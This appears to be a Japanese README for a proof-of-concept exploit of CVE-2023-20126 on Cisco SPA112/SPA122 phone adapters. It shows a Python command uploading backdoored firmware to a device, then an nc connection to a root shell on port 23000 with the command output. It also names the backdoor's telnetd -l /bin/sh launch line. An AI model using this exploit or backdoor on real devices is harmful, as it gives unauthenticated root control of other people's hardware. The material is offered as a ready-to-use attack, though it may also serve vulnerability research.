
CVE-2023-20126 用の PoC
CVE-2023-20126 の最小限の PoC
これは初期リリースです。動作しますが、「最も単純なケース」のエクスプロイトです。
SPA112/SPA122 でテスト済み、動作確認済みです。SPA232D は別のファームウェアイメージが必要です。
ポート 23000/tcp で root シェルを提供します。
ファームウェアを編集するために使用したツールチェーンをまだ整理する必要があり、おそらく別のリポジトリに置く予定です。これは主に @BigNerd95 の作業に基づいていますが、SPA112/122 のファームウェアファイルで動作するように小さな変更を加えています。
$ python3 CVE-2023-20126.py http://192.168.0.152 CFW.bin
Base URL: http://192.168.0.152
Firmware File: CFW.bin
Sending firmware update...
Firmware upgrade successful. Device will reboot eventually and be running the new FW.
< wait a few mins, nervously >
$ nc -v 192.168.0.152 23000
Connection to 192.168.0.152 port 23000 [tcp/inovaport1] succeeded!
????????
BusyBox v1.10.2 (2019-10-14 12:41:41 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
# id;uname -a;pwd
id;uname -a;pwd
uid=0(admin) gid=0(admin)
Linux SPA112 2.6.26.5 #1 PREEMPT Sun Sep 6 10:54:57 CST 2015 armv5tejl unknown
/
# cat /etc/version
cat /etc/version
router_major_version:1.4.1
router_minor_version:SR5
build_date:Mon Oct 14 12:48:12 CST 2019
build_version:6735
hardware_version:1.1.0
telnetd -l /bin/sh -p 23000 を起動し、ポート 23000/tcp で root シェルを提供する Proof of Concept の悪意のあるファームウェアイメージ。bignerd95 の作業に基づいています。WTFPL.
git issue を使用してください。
これであなたのクソデバイスが文鎮化しても、私は一切責任を負いません。
それはあなた自身の問題です。
つまり、私はそのバックドア入りファームウェアを一晩ででっち上げたんです。
それに、なぜあなたは writeup に従って自分自身のバックドア入りファームウェアをビルドしないのですか?